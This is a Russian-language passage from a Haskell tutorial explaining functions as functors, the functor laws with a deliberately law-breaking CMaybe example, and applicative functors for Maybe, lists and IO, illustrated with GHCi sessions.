Другим экземпляром `Functor`, с которым мы все время имели дело, является `(->) r`. Стойте! Что, черт возьми, означает `(->) r`? Тип функции `r -> a` может быть переписан в виде `(->) r a`, так же как мы можем записать `2 + 3` в виде `(+) 2 3`. Когда мы воспринимаем его как `(->) r a`, мы видим `(->)` немного в другом свете. Это просто конструктор типа, который принимает два параметра типа, как это делает `Either`.
Но вспомните, что конструктор типа должен принимать в точности один параметр типа, чтобы его можно было сделать экземпляром `Functor`. Вот почему мы не можем сделать `(->)` экземпляром `Functor`; однако, если частично применить его до `(->) r`, это не составляет каких-либо проблем. Если бы синтаксис позволял частично применять конструкторы типов с помощью секций (как мы можем применить `+`, выполнив `(2+)`, что аналогично `(+) 2`), вы могли бы записать `(->) r` как `(r->)`.
Каким образом функции являются функторами? Хорошо, давайте взглянем на реализацию, которая находится в `Control.Monad.Instances`.
```
instance Functor ((->) r) where
fmap f g = (\x -> f (g x))
```
Давайте сначала подумаем над типом `fmap`:
```
fmap :: (a -> b) -> f a -> f b
```
Далее, давайте мысленно заменим каждую `f`, которая является ролью, что играет наш экземпляр функтора, на `(->) r`. Это позволить нам понять, как `fmap` должна вести себя в случае этого конкретного экземпляра. Вот результат:
```
fmap :: (a -> b) -> ((->) r a) -> ((->) r b)
```
Теперь мы можем записать типы `(->) r a` и `(->) r b` в инфиксном виде, т. е.
`r -> a` и `r -> b`, как мы обычно поступаем с функциями:
```
fmap :: (a -> b) -> (r -> a) -> (r -> b)
```
Хорошо. Отображение одной функции с помощью другой функции должно произвести функцию, так же как отображение `Maybe` с помощью функции должно произвести `Maybe`, а отображение списка с помощью функции должно произвести список. О чем говорит нам предыдущий тип? Мы видим, что он берет функцию из `a` в `b` и функцию из `r` в `a` и возвращает функцию из `r` в `b`. Напоминает ли это вам что-нибудь? Да, композицию функций! Мы присоединяем выход `r -> a` ко входу `a -> b`, чтобы получить функцию `r -> b`, чем в точности и является композиция функций. Вот еще один способ записи этого экземпляра:
```
instance Functor ((->) r) where
fmap = (.)
```
Этот код делает явным, что применение `fmap` к функциям — это просто композиция функций. В скрипте импортируйте `Control.Monad.Instances`, поскольку это модуль, где определен данный экземпляр, а затем загрузите скрипт и попробуйте поиграть с отображением функций:
```
ghci> :t fmap (*3) (+100)
fmap (*3) (+100) :: (Num a) => a -> a
ghci> fmap (*3) (+100) 1
303
ghci> (*3) `fmap` (+100) $ 1
303
ghci> (*3) . (+100) $ 1
303
ghci> fmap (show . (*3)) (*100) 1
"300"
```
Мы можем вызывать `fmap` как инфиксную функцию, чтобы сходство с `.` было явным. Во второй строке ввода мы отображаем `(+100)` с помощью `(*3)`, что дает функцию, которая примет ввод, применит к нему `(+100)`, а затем применит к этому результату `(*3)`. Затем мы применяем эту функцию к `1`.
Как и все функторы, функции могут восприниматься как значения с контекстами. Когда у нас есть функция вроде `(+3)`, мы можем рассматривать значение как окончательный результат функции, а контекстом является то, что мы должны применить эту функцию к чему-то, чтобы получить результат. Применение `fmap (*3)` к `(+100)` создаст еще одну функцию, которая действует так же, как `(+100)`, но перед возвратом результата, к этому результату будет применена `(*3)`.
Тот факт, что `fmap` является композицией функций при применении к функциям, не является на данный момент слишком полезным, но, по крайней мере, он очень интересен. Это также немного меняет наше сознание и позволяет нам увидеть, как сущности, которые действуют скорее как вычисления, чем как коробки (`IO` и `(->) r`), могут быть функторами. Отображение вычисления с помощью функции возвращает тот же самый тип вычисления, но результат этого вычисления изменен функцией.

Перед тем как перейти к законам, которым должна следовать `fmap`, давайте еще раз задумаемся о типе `fmap`:
```
fmap :: (a -> b) -> f a -> f b
```
Введение в каррированные функции в главе 5 началось с утверждения, что все функции в Хаскеле в действительности принимают один параметр. Функция `a -> b -> c` на самом деле берет только один параметр типа `a`, а затем возвращает функцию `b -> c`, которая принимает один параметр и возвращает `c`. Вот почему вызов функции с недостаточным количеством параметров (ее частичное применение) возвращает нам обратно функцию, принимающую несколько параметров, которые мы пропустили (если мы опять воспринимаем функции так, как если они принимают несколько параметров). Поэтому `a -> b -> c` можно записать в виде `a -> (b -> c)`, чтобы сделать каррирование более очевидным.
В том же духе, если мы запишем `fmap :: (a -> b) -> (f a -> f b)`, мы можем воспринимать `fmap` не как функцию, которая принимает одну функцию и значение функтора и возвращает значение функтора, но как функцию, которая принимает функцию и возвращает новую функцию, которая такая же, как и прежняя, за исключением того, что она принимает значение функтора в качестве параметра и возвращает значение функтора в качестве результата. Она принимает функцию `a -> b` и возвращает функцию `f a -> f b`. Это называется «лифтинг функции». Давайте поиграем с этой идеей, используя команду `:t` в GHCi:
```
ghci> :t fmap (*2)
fmap (*2) :: (Num a, Functor f) => f a -> f a
ghci> :t fmap (replicate 3)
fmap (replicate 3) :: (Functor f) => f a -> f [a]
```
Выражение `fmap (*2)` — это функция, которая получает функтор `f` над числами и возвращает функтор над числами. Этим функтором может быть список, значение `Maybe`, `Either String`, или что-то другое. Выражение `fmap (replicate 3)` получит функтор над любым типом и вернет функтор над списком элементов этого типа. Это становится еще очевиднее, если мы частично применим, скажем, `fmap (++"!")`, а затем привяжем ее к имени в GHCi.
Вы можете воспринимать `fmap` двумя способами:
* Как функцию, которая принимает функцию и значение функтора, а затем отображает это значению функтора с помощью данной функции
* Как функцию, которая принимает функцию и выполняет ее лифтинг, так чтобы она оперировала над значениями функторов
Обе точки зрения верны.
Тип `fmap (replicate 3) :: (Functor f) => f a -> f [a]` означает, что функция будет работать с любым функтором. Что именно она будет делать, зависит от функтора. Если мы применим `fmap (replicate 3)` к списку, будет выбрана реализация `fmap` для списка, т. е. просто `map`. Если мы применим ее к `Maybe a`, то она применит `replicate 3` к значению внутри `Just`. Если это значение равно `Nothing`, то оно останется равным `Nothing`. Вот несколько примеров:
```
ghci> fmap (replicate 3) [1,2,3,4]
[[1,1,1],[2,2,2],[3,3,3],[4,4,4]]
ghci> fmap (replicate 3) (Just 4)
Just [4,4,4]
ghci> fmap (replicate 3) (Right "blah")
Right ["blah","blah","blah"]
ghci> fmap (replicate 3) Nothing
Nothing
ghci> fmap (replicate 3) (Left "foo")
Left "foo"
```
Законы функторов
----------------
Предполагается, что все функторы проявляют определенные типы свойств и поведений. Они должны надежно вести себя как сущности, которые можно отобразить. Применение `fmap` к функтору должно только отобразить функтор с помощью функции — ничего более. Это поведение описано в законах функторов. Все экземпляры `Functor` должны следовать этим двум законам. Хаскель не принуждает, чтобы эти законы выполнялись автоматически, поэтому вы должны проверять их сами, когда создаете функтор. Все экземпляры `Functor` в стандартной библиотеке подчиняются этим законам.
### Закон 1
Первый закон функторов гласит, что если мы применяем функцию `id` к значению функтора, то значение функтора, которое мы получим, должно быть таким же, как первоначальное значение функтора. В немного более формальной это значит, что `fmap id = id`. По существу, это говорит, что если мы применим `fmap id` к значению функтора, это должно быть то же самое, что и просто применение `id` к значению. Вспомните, что `id` — это функция тождества, которая просто возвращает свой параметр неизменным. Она также может быть записана в виде `\x -> x`. Если воспринимать значение функтора как что-то, что может быть отображено, то закон `fmap id = id` выглядит довольно тривиально и очевидно.
Давайте посмотрим, выполняется ли этот закон для некоторых значений функторов.
```
ghci> fmap id (Just 3)
Just 3
ghci> id (Just 3)
Just 3
ghci> fmap id [1..5]
[1,2,3,4,5]
ghci> id [1..5]
[1,2,3,4,5]
ghci> fmap id []
[]
ghci> fmap id Nothing
Nothing
```
Если посмотреть на реализацию `fmap`, например, для `Maybe`, мы можем понять, почему выполняется первый закон функторов:
```
instance Functor Maybe where
fmap f (Just x) = Just (f x)
fmap f Nothing = Nothing
```
Мы представляем, что `id` играет роль параметра`f` в этой реализации. Нам видно, что если мы применяем `fmap id` к `Just x`, то результатом будет `Just (id x)`, и поскольку `id` просто возвращает свой параметр, мы можем сделать вывод, что `Just (id x)` равно `Just x`. Поэтому теперь нам известно, что если мы применим `id` к значению `Maybe`, созданному с помощью конструктора значений `Just`, обратно мы получаем то же самое значение.
Видеть, что применение `id` к `Nothing` возвращает то же самое значение, тривиально. Поэтому из этих двух равенств в реализации `fmap` нам видно, что закон `fmap id = id` соблюдается.
### Закон 2
 Второй закон говорит, что композиция двух функций и последующее применение результирующей функции к функтору должно давать такой же результат, что и применение первой функции к функтору, а затем применение другой функции. В формальной записи это значит, что `fmap (f . g) = fmap f . fmap g`. Или если записать по-другому, то для любого значения функтора `x` должно выполняться следующее: `fmap (f . g) x = fmap f (fmap g x)`.
Если мы можем выявить, что некоторый тип подчиняется двум законам функторов, мы можем надеяться, что он обладает такими же фундаментальными поведениями, как и другие функторы, когда дело доходит до отображения. Мы можем знать, что когда мы применяем к нему `fmap`, за кулисами ничего не случится кроме отображения, и что он будет действовать как сущность, которая может быть отображена — т. е. функтор.
Мы можем выяснить, как второй закон выполняется по отношению к некоторому типу, посмотрев на реализацию `fmap` для этого типа, а затем использовав метод, который мы применяли, чтобы проверить, подчиняется ли `Maybe` первому закону. Итак, чтобы проверить, как второй закон функторов выполняется для `Maybe`, если мы применим `fmap (f . g)` к `Nothing`, мы получаем `Nothing`, потому что применение любой функции к `Nothing` дает `Nothing`. Если мы выполним `fmap f (fmap g Nothing)`, мы получим `Nothing` по тем же причинам.
Довольно просто увидеть, как второй закон выполняется для `Maybe`, когда значение равно `Nothing`. Но что, если это значение `Just`? Ладно, если мы выполним `fmap (f . g) (Just x)`, из реализации нам видно, что это реализовано как `Just ((f . g) x)`, что аналогично `Just (f (g x))`. Если мы выполним `fmap f (fmap g (Just x))`, из реализации нам видно, что `fmap g (Just x)` это `Just (g x)`. Следовательно, `fmap f (fmap g (Just x))` равно `fmap f (Just (g x))`, а из реализации нам видно, что это равно `Just (f (g x))`.
Если вы немного смущены этим доказательством, не волнуйтесь. Убедитесь, что вы понимаете, как устроена композиция функций. Часто вы можете интуитивно понимать, как выполняются эти законы, поскольку типы действуют как контейнеры или функции. Вы также можете просто проверить их на нескольких разных значениях типа и суметь с определенной долей уверенности сказать, что тип действительно подчиняется этим законам.
### Нарушение закона
Давайте посмотрим на патологичный пример конструктора типов, который является экземпляром класса типов Functor, но не является функтором, потому что он не выполняет законы. Скажем, что у нас есть следующий тип:
```
data CMaybe a = CNothing | CJust Int a deriving (Show)
```
`C` здесь обозначает счетчик. Это тип данных, который во многом похож на Maybe a, только часть `Just` содержит два поля вместо одного. Первое поле в конструкторе значений `CJust` всегда будет иметь тип `Int`, и оно будет своего рода счётчиком. А второе поле имеет тип `a`, который берется из параметра типа, и его тип будет зависеть от конкретного типа, который мы выберем для `CMaybe a`. Давайте поиграем с нашим новым типом:
```
ghci> CNothing
CNothing
ghci> CJust 0 "haha"
CJust 0 "haha"
ghci> :t CNothing
CNothing :: CMaybe a
ghci> :t CJust 0 "haha"
CJust 0 "haha" :: CMaybe [Char]
ghci> CJust 100 [1,2,3]
CJust 100 [1,2,3]
```
Если мы используем конструктор `CNothing`, в нём нет полей. Если мы используем конструктор `CJust`, первое поле является целым числом, а второе — может быть любого типа. Давайте сделаем этот тип экземпляром `Functor`, так чтобы каждый раз, когда мы используем `fmap`, функция применялась ко второму полю, а первое поле увеличивалось на `1`.
```
instance Functor CMaybe where
fmap f CNothing = CNothing
fmap f (CJust counter x) = CJust (counter+1) (f x)
```
Это отчасти похоже на реализацию экземпляра для `Maybe`, только когда мы применяем `fmap` к значению, которое не представляет пустую коробку (значение `CJust`), мы не просто применяем функцию к содержимому, мы также увеличиваем счетчик на `1`. Пока вроде всё круто. Мы даже можем немного поиграть с этим:
```
ghci> fmap (++"ha") (CJust 0 "ho")
CJust 1 "hoha"
ghci> fmap (++"he") (fmap (++"ha") (CJust 0 "ho"))
CJust 2 "hohahe"
ghci> fmap (++"blah") CNothing
CNothing
```
Подчиняется ли этот тип законам функторов? Для того, чтобы увидеть, что что-то не подчиняется закону, достаточно найти всего один контрпример.
```
ghci> fmap id (CJust 0 "haha")
CJust 1 "haha"
ghci> id (CJust 0 "haha")
CJust 0 "haha"
```
Как гласит первый закон функторов, если мы отобразим значение функтора с помощью id, это должно быть то же самое, что и просто вызов `id` с тем же значением функтора. Наш пример показывает, что это не относится к нашему функтору `CMaybe`. Хотя он и является частью класса типов `Functor`, он не подчиняется данному закону функторов и, следовательно, не является функтором.
Поскольку `CMaybe` не является функтором, хотя он и притворяется таковым, использование его в качестве функтора может привести к неисправному коду. Когда мы используем функтор, не должно иметь значения, производим ли мы сначала композицию нескольких функций, а затем с ее помощью отображаем значение функтора, или же мы просто отображаем значение функтора последовательно с помощью каждой функции. Но при использовании `CMaybe` это имеет значение, так как он следит, сколько раз его отобразили. Не круто! Если мы хотим, чтобы `CMaybe` подчинялся законам функторов, мы должны сделать так, чтобы поле Int не изменялось, когда мы используем `fmap`.
Вначале законы функторов могут показаться немного запутанными и ненужными. Но если мы знаем, что тип подчиняется обоим законам, мы можем строить определенные предположения о том, как он будет действовать. Если тип подчиняется законам функторов, мы знаем, что вызов `fmap` со значением этого типа только применит к нему функцию — ничего более. Это приводит к коду, который является более абстрактным и расширяемым, потому что мы можем использовать законы, чтобы судить о поведениях, которыми должен обладать любой функтор, а также создавать функций, надежно работающие с любым функтором.
В следующий раз, когда вы будете делать тип экземпляром `Functor`, найдите минутку, чтобы убедиться, что он удовлетворяет законам функторов. Вы всегда можете просто пройти по реализации строка за строкой и посмотреть, выполняются ли законы, либо попробовать найти контрпример. После того, как вы рассмотрите достаточное количество функторов, вы станете узнавать общие для них свойства и поведения и интуитивно понимать, следует ли тот или иной тип законам функторов.
Использование аппликативных функторов
-------------------------------------

В этом разделе мы рассмотрим аппликативные функторы, которые являются расширенными функторами.
До настоящего времени мы были сосредоточены на отображении функторов с помощью функций, принимающих только один параметр. Но что происходит, когда мы отображаем функтор с помощью функции, которая принимает два параметра? Давайте посмотрим на пару конкретных примеров:
Если у нас есть `Just 3` и мы выполняем `fmap (*) (Just 3)`, что мы получим? Из реализации экземпляра `Maybe` для `Functor` мы знаем, что если это значение `Just`, функция будет применена к значению внутри `Just`. Следовательно выполнение `fmap (*) (Just 3)` вернет `Just ((*) 3)`, что может быть так же записано в виде `Just (3 *)`, если мы используем секции. Интересно! Мы получаем функцию, обернутую в `Just`!
Вот еще несколько функций внутри значений функторов:
```
ghci> :t fmap (++) (Just "hey")
fmap (++) (Just "hey") :: Maybe ([Char] -> [Char])
ghci> :t fmap compare (Just 'a')
fmap compare (Just 'a') :: Maybe (Char -> Ordering)
ghci> :t fmap compare "A LIST OF CHARS"
fmap compare "A LIST OF CHARS" :: [Char -> Ordering]
ghci> :t fmap (\x y z -> x + y / z) [3,4,5,6]
fmap (\x y z -> x + y / z) [3,4,5,6] :: (Fractional a) => [a -> a -> a]
```
Если мы отображаем список символов с помощью `compare`, которая имеет тип `(Ord a) => a -> a -> Ordering`, мы получаем список функций типа `Char -> Ordering`, потому что функция `compare` частично применяется с помощью символов в списке. Это не список функций типа `(Ord a) => a -> Ordering`, так как первая примененная `a` имела тип `Char`, а потому и вторая `a` обязана принять решение о том, чтобы иметь тип `Char`.
Мы видим, как отображая значения функторов с помощью «многопараметрических» функций, мы получаем значения функторов, которые содержат внутри себя функции. Так что мы теперь можем с ними делать? Например, мы можем отображать их с помощью функций, которые принимают эти функции в качестве параметров, потому что независимо от того, что находится в значении функтора, оно будет передано функции, с помощью которой мы отображаем его, в качестве параметра.
```
ghci> let a = fmap (*) [1,2,3,4]
ghci> :t a
a :: [Integer -> Integer]
ghci> fmap (\f -> f 9) a
[9,18,27,36]
```
Но что, если у нас есть значение функтора `Just (3 *)` и значение функтора `Just 5`, и мы хотим извлечь функцию из `Just (3 *)` и отобразить с ее помощью `Just 5`? С обычными функторами у нас этого не получится, потому что они поддерживают только отображение имеющихся функторов с помощью обычных функций. Даже когда мы отображали функтор, содержащий функции, с помощью `\f -> f 9`, мы просто отображали его с помощью обычной функции. Но используя то, что предлагает нам `fmap`, мы не можем с помощью функции, которая находится внутри значения функтора, отобразить другое значение функтора. Мы могли бы произвести сопоставление конструктора `Just` по образцу для извлечения из него функции, а затем отобразить с ее помощью `Just 5`, но мы ищем более общий и абстрактный подход, работающий с функторами.
### Поприветствуйте аппликативные функторы
Встречайте класс типов Applicative, находящийся в модуле `Control.Applicative`. Он определяет две функции: `pure` и `<*>`. Он не предоставляет реализации по умолчанию для какой-либо из этих функций, поэтому нам придется определить их обе, если мы хотим чтобы что-то стало аппликативным функтором. Этот класс определён вот так:
```
class (Functor f) => Applicative f where
pure :: a -> f a
(<*>) :: f (a -> b) -> f a -> f b
```
Это простое определение класса из трех строк говорит нам о многом! Первая строка начинается с определения класса `Applicative`, и она также вводит ограничение класса. Ограничение говорит, что если мы хотим сделать конструктор типа частью класса типов `Applicative`, он, прежде всего, должен принадлежать классу типов `Functor`. Вот почему когда нам известно, что конструктор типа принадлежит классу типов `Applicative`, он также принадлежит классу типов `Functor`, так что мы можем применять к нему `fmap`.
Первый метод, который он определяет, называется `pure`. Его объявление типа выглядит как `pure :: a -> f a`. `f` играет здесь роль нашего экземпляра аппликативного функтора. Так как Хаскель обладает очень хорошей системой типов, и так как все, что может делать функция — это получать некоторые параметры и возвращать некоторое значение, мы можем многое сказать по объявлению типа, и этот тип — не исключение.
`pure` должна принимать значение любого типа и возвращать аппликативное значение с этим значением внутри него. Словосочетание «внутри него», опять ссылается на нашу аналогию с коробкой, хотя мы и видели, что она не всегда выдерживает проверку. Но тип `a -> f a` все равно довольно нагляден. Мы берем значение и оборачиваем его в аппликативное значение, которое содержит в себе это значение в качестве результата. Более лучший способ представить себе `pure` — это сказать, что она берет значение и помещает его в некий контекст по умолчанию (или чистый контекст) — минимальный контекст, который по-прежнему возвращает это значение.
Функция `<*>` действительно интересная. У нее вот такое определение типа:
```
f (a -> b) -> f a -> f b
```
Напоминает ли оно вам что-нибудь? Оно похоже на `fmap :: (a -> b) -> f a -> f b`. Вы можете воспринимать функцию `<*>` как разновидность расширенной `fmap`. Тогда как `fmap` принимает функцию и значение функтора, и применяет функцию внутри значения функтора, `<*>` принимает значение функтора, который содержит в себе функцию, и другой функтор, и извлекает эту функцию из первого функтора, отображая затем второй функтор с ее помощью.
### Аппликативный функтор Maybe
Давайте взглянем на реализацию экземпляра `Applicative` для `Maybe`:
```
instance Applicative Maybe where
pure = Just
Nothing <*> _ = Nothing
(Just f) <*> something = fmap f something
```
Опять же, из определения класса мы видим, что `f`, которая играет роль аппликативного функтора, должна принимать один конкретный тип в качестве параметра, поэтому мы пишем instance `Applicative Maybe where` вместо `instance Applicative (Maybe a) where`.
Далее, у нас есть `pure`. Вспомните, что функция должна принять что-то и обернуть это в аппликативное значение. Мы написали `pure = Just`, потому что конструкторы значений вроде `Just` являются обычными функциями. Мы также могли бы написать `pure x = Just x`.
Наконец, у нас есть определение `<*>`. Мы не можем извлечь функцию из `Nothing`, потому что внутри него нет функции. Поэтому мы говорим, что если мы пробуем извлечь функцию из `Nothing`, результатом будет `Nothing`.
В определении класса `Applicative` есть ограничение класса `Functor`, что значит, что мы можем считать, что оба параметра функции `<*>` являются значениями функтора. Если первым аргументом является не `Nothing`, а `Just` с некоторой функцией внутри, тогда мы говорим, что с помощью этой функции мы хотим отобразить второй параметр. Этот код также заботится о случае, когда вторым аргументом является `Nothing`, потому что отображение `Nothing` с помощью любой функции, используя `fmap`, вернет `Nothing`. Итак, в случае с `Maybe` функция `<*>` извлекает функцию из значения слева, если это `Just`, и отображает с ее помощью значение справа. Если какой-либо из параметров является `Nothing`, то результатом будет `Nothing`.
Теперь давайте это опробуем:
```
ghci> Just (+3) <*> Just 9
Just 12
ghci> pure (+3) <*> Just 10
Just 13
ghci> pure (+3) <*> Just 9
Just 12
ghci> Just (++"hahah") <*> Nothing
Nothing
ghci> Nothing <*> Just "woot"
Nothing
```
Вы видите, что выполнение `pure (+3)` и `Just (+3)` в данном случае — это одно и то же. Используйте `pure`, если вы имеете дело со значениями `Maybe` в аппликативном контексте (используете их с `<*>`); в противном случае придерживайтесь использования `Just`.
Первые четыре введенных строки демонстрируют, как функция извлекается, а затем используется для отображения, но в данном случае, этого можно было добиться просто применив необернутые фукнции к функторам. Последняя строка любопытна тем, что мы пытаемся извлечь функцию из `Nothing`, а затем отображаем что-то с ее помощью, что дает в результате `Nothing`.
Когда вы отображаете функтор с помощью функции при использовании обычных функторов, вы не можете извлечь результат каким-либо общим способом, даже если результатом является частично примененная функция. Аппликативные функторы, с другой стороны, позволяют вам работать с несколькими функторами, используя одну функцию.
### Аппликативный стиль
При использовании класса типов `Applicative` мы можем поместить использование функции `<*>` в цепочку, что позволяет нам легко работать сразу с несколькими аппликативными значениями, а не только с одним. Взгляните, например, на это:
```
ghci> pure (+) <*> Just 3 <*> Just 5
Just 8
ghci> pure (+) <*> Just 3 <*> Nothing
Nothing
ghci> pure (+) <*> Nothing <*> Just 5
Nothing
```
 Мы обернули функцию `+` в аппликативное значение, а затем использовали `<*>`, чтобы вызвать ее с двумя параметрами, оба из которых являются аппликативными значениями.
Давайте посмотрим, как это происходит, шаг за шагом. `<*>` левоассоциативна, что значит, что это:
```
pure (+) <*> Just 3 <*> Just 5
```
то же самое, что и вот это:
```
(pure (+) <*> Just 3) <*> Just 5
```
Сначала функция `+` помещается в аппликативное значение — в данном случае значение `Maybe`, которое содержит функцию. Итак, у нас есть `pure (+)`, что по сути равно `Just (+)`. Далее, происходит вызов `Just (+) <*> Just 3`. Его результатом является `Just (3+)`. Это из-за частичного применения. Применение только `3` к функции `+` возвращает в результате функцию, которая принимает один параметр и добавляет к нему `3`. Наконец, выполняется `Just (3+) <*> Just 5`, что в результате возвращает `Just 8`.
Ну разве не здорово?! Аппликативные функторы и аппликативный стиль вычисления `pure f <*> x <*> y <*> ...` позволяют взять функцию, которая ожидает параметры, не являющиеся аппликативными значениями, и использовать эту функцию для работы с несколькими аппликативными значениями. Функция может принимать столько параметров, сколько мы захотим, потому что она всегда частично применяется шаг за шагом между вхождениями`<*>`.
Это становится еще более удобным и очевидным, если мы примем во внимание тот факт, что `pure f <*> x` равно `fmap f x`. Это является одним из аппликативных законов. Мы рассмотрим аппликативные законы более детально позже в этой главе, но давайте подумаем, как это применяется здесь. `pure` помещает значение в контекст по умолчанию. Если мы просто поместим функцию в контекст по умолчанию, а затем извлечем ее и применим к значению внутри другого аппликативного функтора, это будет то же самое, что просто отобразить этот аппликативный функтор с помощью этой функции. Вместо записи `pure f <*> x <*> y <*> ...`, мы можем написать `fmap f x <*> y <*> ...`. Вот почему `Control.Applicative` экспортирует функцию, названную `<$>`, которая является просто функцией `fmap` в виде инфиксного оператора. Вот как она определена:
```
(<$>) :: (Functor f) => (a -> b) -> f a -> f b
f <$> x = fmap f x
```
**ПРИМЕЧАНИЕ**: *Вспомните, что переменные типов не зависят от имен параметров или имен других значений. Здесь `f` в объявлении функции является переменной типа с ограничением класса, которое говорит, что любой конструктор типа, который заменяет `f`, должен входить в класс типов `Functor`. `f` в теле функции обозначает функцию, с помощью которой мы отображаем `x`. Тот факт, что мы использовали `f` для представления обоих вещей не означает, что они представляют одну и ту же вещь.*
При использовании `<$>` аппликативный стиль проявляет себя во всей красе, потому что теперь если мы хотим применить функцию `f` к трем аппликативным значениям, мы можем просто написать `f <$> x <*> y <*> z`. Если бы параметры были обычными значениями, мы бы написали `f x y z`.
Давайте подробнее рассмотрим, как это работает. Предположим, что мы хотим соединить значения `Just "johntra"` и `Just "volta"` в одну строку, находящуюся внутри функтора `Maybe`. Мы можем это сделать:
```
ghci> (++) <$> Just "johntra" <*> Just "volta"
Just "johntravolta"
```
Перед тем, как мы увидим как это происходит, сравните предыдущую строку с этой:
```
ghci> (++) "johntra" "volta"
"johntravolta"
```
Чтобы использовать обычную функцию с аппликативным функторам, просто разбросайте вокруг несколько `<$>` и `<*>`, и функция будет работать с аппликативными значениями и возвращать аппликативное значение. Ну не здорово ли?
Возвращаясь к нашей `(++) <$> Just "johntra" <*> Just "volta"`: Сначала `(++)`, которая имеет тип `(++) :: [a] -> [a] -> [a]` отображает `Just "johntra"`. Это дает в результате значение такое же, как `Just ("johntra"++)`, и имеющее тип `Maybe ([Char] -> [Char])`. Заметьте, как первый параметр функции `(++)` был съеден и как `a` превратились в значения `Char`. А теперь выполняется выражение `Just ("johntra"++) <*> Just "volta"`, которое извлекает функцию из `Just` и отображает с ее помощью `Just "volta"`, что в результате дает `Just "johntravolta"`. Если бы одним из двух значений было `Nothing`, результатом также было бы `Nothing`.
### Списки
Списки (на самом деле конструктор типа списка, `[]`) являются аппликативными функторами. Вот так сюрприз! А вот как `[]` является экземпляром `Applicative`:
```
instance Applicative [] where
pure x = [x]
fs <*> xs = [f x | f <- fs, x <- xs]
```
Вспомните, что `pure` принимает значение и помещает его в контекст по умолчанию. Другими словами, она помещает его в минимальный контекст, который все еще возвращает это значение. Минимальным контекстом для списков был бы пустой список, но пустой список означает отсутствие значения, поэтому он не может содержать в себе значение, к которому мы применили `pure`. Вот почему `pure` принимает значение и помещает его в одноэлементный список. Подобным образом, минимальным контекстом для аппликативного функтора `Maybe` было бы `Nothing`, но оно означает отсутствие значения вместо самого значения, поэтому `pure` в реализации экземпляра для `Maybe` реализована как `Just`.
Вот `pure` в действии:
```
ghci> pure "Hey" :: [String]
["Hey"]
ghci> pure "Hey" :: Maybe String
Just "Hey"
```
Что насчет `<*>`? Если бы тип функции `<*>` ограничивался бы только списками, мы получили бы `(<*>) :: [a -> b] -> [a] -> [b]`. Данная функция реализована через генератор списка. `<*>` должна каким-то образом извлечь функцию из своего левого параметра, а затем отобразить с ее помощью правый параметр. Но левый список может не содержать в себе функций, содержать одну функцию, либо несколько функций, а правый список может также содержать несколько значений. Вот почему мы используем генератор списка для извлечения из обоих списков. Мы применяем каждую возможную функцию из левого списка к каждому возможному значению из правого списка. Результирующий список содержит все возможные комбинации применения функции из левого списка к значению из правого.
Мы можем использовать `<*>` со списками вот так:
```
ghci> [(*0),(+100),(^2)] <*> [1,2,3]
[0,0,0,101,102,103,1,4,9]
```
Левый список содержит три функции, а правый список содержит три значения, поэтому в результирующем списке будет девять элементов. Каждая функция из левого списка применяется к каждому элементу из правого. Если у нас имеется список функций, принимающих два параметра, то мы можем применить эти функции между двумя списками.
В следующем примере мы применяем две функции между двумя списками:
```
ghci> [(+),(*)] <*> [1,2] <*> [3,4]
[4,5,5,6,3,4,6,8]
```
`<*>` левоассоциативна, поэтому сначала выполняется `[(+),(*)] <*> [1,2]`, результатом чего является список такой же, как `[(1+),(2+),(1*),(2*)]`, потому что каждая функция слева применяется к каждому значению справа. Затем выполняется `[(1+),(2+),(1*),(2*)] <*> [3,4]`, что возвращает окончательный результат.
Как здорово использовать аппликативный стиль со списками!
```
ghci> (++) <$> ["ha","heh","hmm"] <*> ["?","!","."]
["ha?","ha!","ha.","heh?","heh!","heh.","hmm?","hmm!","hmm."]
```
Еще раз, мы использовали обычную функцию, принимающую две строки, между двумя списками строк, просто вставляя соответствующий аппликативные операторы.
Вы можете воспринимать списки как недетерминированные вычисления. Значение вроде `100` или `"what"` можно рассматривать как детерминированное вычисление, которое имеет только один результат, тогда как список вроде `[1,2,3]` можно рассматривать как вычисление, которое не может определиться, какой результат оно желает иметь, поэтому оно возвращает нам все возможные результаты. Поэтому когда вы пишете что-то наподобие `(+) <$> [1,2,3] <*> [4,5,6]`, вы можете рассматривать это как объединение двух недетерминированных вычислений с помощью `+` только для того, чтобы создать еще одно недетерминированное вычисление, которое еще меньше уверено в своем результате.
Использование аппликативного стиля со списками часто является хорошей заменой генераторам списков. В главе 1 мы хотели увидеть все возможные комбинации произведений `[2,5,10]` и `[8,10,11]`, так что мы делали вот это:
```
ghci> [ x*y | x <- [2,5,10], y <- [8,10,11]]
[16,20,22,40,50,55,80,100,110]
```
Мы просто извлекаем значения из обоих списков и применяем функцию между каждой комбинацией элементов. Это также можно сделать в аппликативном стиле:
```
ghci> (*) <$> [2,5,10] <*> [8,10,11]
[16,20,22,40,50,55,80,100,110]
```
Для меня такой подход более понятен, поскольку проще понять, что мы просто вызываем `*` между двумя недетерминированными вычислениями. Если мы захотели бы получить все возможные произведения элементов этих двух списков, больших `50`, мы бы использовали следующее:
```
ghci> filter (>50) $ (*) <$> [2,5,10] <*> [8,10,11]
[55,80,100,110]
```
Легко увидеть, что вызов `pure f <*> xs` при использовании списков эквивалентен `fmap f xs`. `pure f` — это просто `[f]`, а `[f] <*> xs` применит каждую функцию в левом списке к каждому значению в правом, но в левом списке только одна функция, потому это похоже на отображение.
### IO тоже является аппликативным функтором
Другим экземпляром `Applicative`, с которым мы уже встречались, является `IO`. Вот как реализован этот экземпляр:
```
instance Applicative IO where
pure = return
a <*> b = do
f <- a
x <- b
return (f x)
```

Поскольку суть `pure` состоит в помещении значения в минимальный контекст, который все еще содержит значение как результат, логично, что `pure` — это просто `return`. `return` создает действие ввода-вывода, которое ничего не делает. Оно просто возвращает какое-то значение в качестве своего результата, не производя никаких операций ввода-вывода вроде печати на терминал или чтения из файла.
Если бы `<*>` ограничивалась работой с `IO`, она бы имела тип `(<*>) :: IO (a -> b) -> IO a -> IO b`. В случае с `IO` она принимает действие ввода-вывода `a`, которое возвращает функцию, выполняет действие ввода-вывода и связывает эту функцию с `f`. Затем она выполняет действие ввода-вывода `b` и связывает его результат с `x`. Наконец, она применяет функцию `f` к `x` и возвращает результат этого применения в качестве результата. Чтобы это реализовать мы использовали здесь синтаксис `do`. (Вспомните, что суть синтаксиса `do` заключается в том, чтобы взять несколько действий ввода-вывода и склеить их вместе в одно действие.)
